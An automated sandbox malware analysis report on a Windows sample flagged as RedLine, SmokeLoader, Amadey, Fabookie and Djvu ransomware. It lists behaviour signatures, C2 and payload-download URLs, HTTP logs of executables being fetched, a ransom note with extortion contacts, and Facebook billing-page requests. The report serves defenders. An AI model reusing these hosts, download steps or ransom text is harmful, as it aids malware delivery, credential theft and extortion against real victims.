Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 722349
MD5: 9e93319d00389f1c55611665e404ea9b
SHA1: 23aa8aed6a57519e0c4107fc6f6a7f16efe20741
SHA256: 4e189ba8eaaecc5142cc89fe40d696d216291e906f66b261af8bb0eda2bdcf60
Tags: exe
Infos:

Detection

Amadey, Djvu, Fabookie, RedLine, SmokeLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Yara detected SmokeLoader
Yara detected Amadey bot
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Antivirus detection for dropped file
Snort IDS alert for network traffic
Yara detected Fabookie
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected Djvu Ransomware
Multi AV Scanner detection for domain / URL
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Deletes itself after installation
Tries to detect virtualization through RDTSC time measurements
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Tries to harvest and steal browser information (history, passwords, etc)
Detected VMProtect packer
Writes to foreign memory regions
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Yara signature match
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Found potential string decryption / allocating functions
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Entry point lies outside standard sections
Creates a DirectInput object (often for capturing keystrokes)

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\EAA.exe Avira: detection malicious, Label: HEUR/AGEN.1210630
Source: C:\Users\user\AppData\Local\Temp\2A57.exe Avira: detection malicious, Label: HEUR/AGEN.1210630
Multi AV Scanner detection for domain / URL
Source: kkh.eiwagggg.com Virustotal: Detection: 5% Perma Link
Source: en.eredirected.xyz Virustotal: Detection: 21% Perma Link
Machine Learning detection for sample
Source: file.exe Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\ECFD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EAA.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\2A57.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\F4FD.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\udgatra Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\9763.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\EB37.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\B03C.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\tfgatra Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\543.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\857.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\3804.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 10.0.3804.exe.400000.2.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.3804.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.3804.exe.400000.3.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.0.3804.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000001.00000000.389821626.0000000002901000.00000020.80000000.00040000.00000000.sdmp Malware Configuration Extractor: SmokeLoader {"C2 list": ["http://liubertiyyyul.net/", "http://bururutu44org.org/", "http://youyouumenia5.org/", "http://nvulukuluir.net/", "http://nuluitnulo.me/", "http://guluiiiimnstra.net/"]}
Source: 9.0.ECFD.exe.400000.7.unpack Malware Configuration Extractor: Djvu {"Download URLs": ["http://rgyui.top/dl/build2.exe", "http://winnlinne.com/files/1/build3.exe"], "C2 url": "http://winnlinne.com/lancer/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-oTIha7SI4s\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@fishmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0581Jhyjd", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\
Uses 32bit PE files
Source: file.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 172.67.144.83:443 -> 192.168.2.5:49699 version: TLS 1.2
Source: unknown HTTPS traffic detected: 185.220.204.62:443 -> 192.168.2.5:49700 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.17.35:443 -> 192.168.2.5:49702 version: TLS 1.2
Source: unknown HTTPS traffic detected: 198.23.58.153:443 -> 192.168.2.5:49718 version: TLS 1.2
Source: unknown HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.5:49728 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 66.96.149.30:443 -> 192.168.2.5:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 157.240.20.35:443 -> 192.168.2.5:49745 version: TLS 1.2
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
Source: Binary string: #+C:\dobixuyapuxez\cohimu_88 jekumuhe\67.pdb source: F4FD.exe, 00000006.00000000.449000017.0000000000401000.00000020.00000001.01000000.00000008.sdmp, udgatra, 00000015.00000002.602489552.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, udgatra, 00000015.00000000.543137145.0000000000401000.00000020.00000001.01000000.0000000F.sdmp
Source: Binary string: .C:\topefife94\vafivesobuvo12\nugotelosowos\jiwewoha.pdb source: file.exe
Source: Binary string: ]C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
Source: Binary string: C:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: ECFD.exe, 00000009.00000000.567462194.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000002.598151437.0000000000400000.00000040.00000400.00020000.00000000.sdmp, ECFD.exe, 00000009.00000000.556782273.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: C:\setupipayadewu\gala\muhoci-yileyowip71.pdb source: ECFD.exe, 00000005.00000000.443846038.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe, 00000009.00000000.486986085.0000000000401000.00000020.00000001.01000000.00000007.sdmp, ECFD.exe.1.dr
Source: Binary string: MC:\ziradevetu84\faduxusiyipa29\jigi.pdb( source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: Binary string: CC:\feyiguha\pelejitahuhufe14 gewofaj.pdb source: 543.exe, 0000000B.00000000.489003730.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: C:\ziradevetu84\faduxusiyipa29\jigi.pdb source: 3804.exe, 0000000A.00000000.485964331.0000000000401000.00000020.00000001.01000000.0000000B.sdmp
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\html\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\_locales\bg\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\css\ Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.5_0\images\ Jump to behavior

Networking
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Domain query: kkh.eiwagggg.com
Source: C:\Windows\explorer.exe Domain query: keziheritier.com
Source: C:\Windows\explorer.exe Domain query: github.com
Source: C:\Windows\explorer.exe Domain query: furubujjul.net
Source: C:\Windows\explorer.exe Domain query: pelegisr.com
Source: C:\Windows\explorer.exe Domain query: www.rukangiralawchambers.org
Source: C:\Windows\explorer.exe Domain query: avtlsgosecure.com
Source: C:\Windows\explorer.exe Network Connect: 45.138.74.52 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 179.43.163.115 80 Jump to behavior
Snort IDS alert for network traffic
Source: Traffic Snort IDS: 2039103 ET TROJAN Suspected Smokeloader Activity (POST) 192.168.2.5:49696 -> 172.67.203.213:80
Source: Traffic Snort IDS: 2018581 ET TROJAN Single char EXE direct download likely trojan (multiple families) 192.168.2.5:49697 -> 45.138.74.52:80
Performs DNS queries to domains with low reputation
Source: DNS query: jamesmillion.xyz
Source: DNS query: en.eredirected.xyz
Source: DNS query: en.xml-post.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: http://winnlinne.com/lancer/get.php
Source: Malware configuration extractor URLs: http://liubertiyyyul.net/
Source: Malware configuration extractor URLs: http://bururutu44org.org/
Source: Malware configuration extractor URLs: http://youyouumenia5.org/
Source: Malware configuration extractor URLs: http://nvulukuluir.net/
Source: Malware configuration extractor URLs: http://nuluitnulo.me/
Source: Malware configuration extractor URLs: http://guluiiiimnstra.net/
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 13 Oct 2022 11:07:17 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Thu, 13 Oct 2022 11:00:53 GMTETag: "34a00-5eae86c49704d"Accept-Ranges: bytesContent-Length: 215552Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 93 9c 0f ba d7 fd 61 e9 d7 fd 61 e9 d7 fd 61 e9 c9 af f4 e9 c0 fd 61 e9 c9 af e2 e9 ac fd 61 e9 f0 3b 1a e9 d0 fd 61 e9 d7 fd 60 e9 41 fd 61 e9 c9 af e5 e9 e3 fd 61 e9 c9 af f5 e9 d6 fd 61 e9 c9 af f0 e9 d6 fd 61 e9 52 69 63 68 d7 fd 61 e9 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 82 58 a7 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 d6 01 00 00 5a 17 00 00 00 00 00 f6 a0 00 00 00 10 00 00 00 f0 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 20 19 00 00 04 00 00 c0 8d 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 fc d7 01 00 50 00 00 00 00 d0 18 00 38 4c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 39 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 38 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 fa d4 01 00 00 10 00 00 00 d6 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 1c dd 16 00 00 f0 01 00 00 22 01 00 00 da 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 4c 00 00 00 d0 18 00 00 4e 00 00 00 fc 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0Date: Thu, 13 Oct 2022 11:07:19 GMTContent-Type: application/octet-streamContent-Length: 6174208Last-Modified: Thu, 13 Oct 2022 11:00:44 GMTConnection: keep-aliveETag: "6347efdc-5e3600"Accept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 90 09 00 00 a2 54 00 00 00 00 00 74 9e 09 00 00 10 00 00 00 a0 09 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 5e 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 09 00 cc 24 00 00 00 d0 0a 00 00 b0 53 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 0a 00 bc ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 0a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 d4 8e 09 00 00 10 00 00 00 90 09 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 c4 18 00 00 00 a0 09 00 00 1a 00 00 00 94 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 c9 0c 00 00 00 c0 09 00 00 00 00 00 00 ae 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 cc 24 00 00 00 d0 09 00 00 26 00 00 00 ae 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 40 00 00 00 00 00 0a 00 00 00 00 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 10 0a 00 00 02 00 00 00 d4 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 65 6c 6f 63 00 00 bc ae 00 00 00 20 0a 00 00 b0 00 00 00 d6 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 b0 53 00 00 d0 0a 00 00 b0 53 00 00 86 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 80 5e 00 00 00 00 00 00 36 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /files/pe/pb1113.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: kkh.eiwagggg.com
Source: global traffic HTTP traffic detected: GET /upload/ChromeSetup.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: pelegisr.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /22.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: www.rukangiralawchambers.org
Source: global traffic HTTP traffic detected: GET /testermanmag/myownre/raw/main/explorer.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: github.com
Source: global traffic HTTP traffic detected: GET /jamesp.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
Source: global traffic HTTP traffic detected: GET /ads/manager/account_settings/account_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /login.php?next=https%3A%2F%2Fwww.facebook.com%2Fads%2Fmanager%2Faccount_settings%2Faccount_billing HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1Host: www.facebook.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36viewport-width: 1920sec-ch-ua: "Chromium";v="104", " Not A; Brand";v="99", "Google Chrome";v="104"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-prefers-color-scheme: lightUpgrade-Insecure-Requests: 1Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: document
Source: global traffic HTTP traffic detected: GET /7.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: keziheritier.com
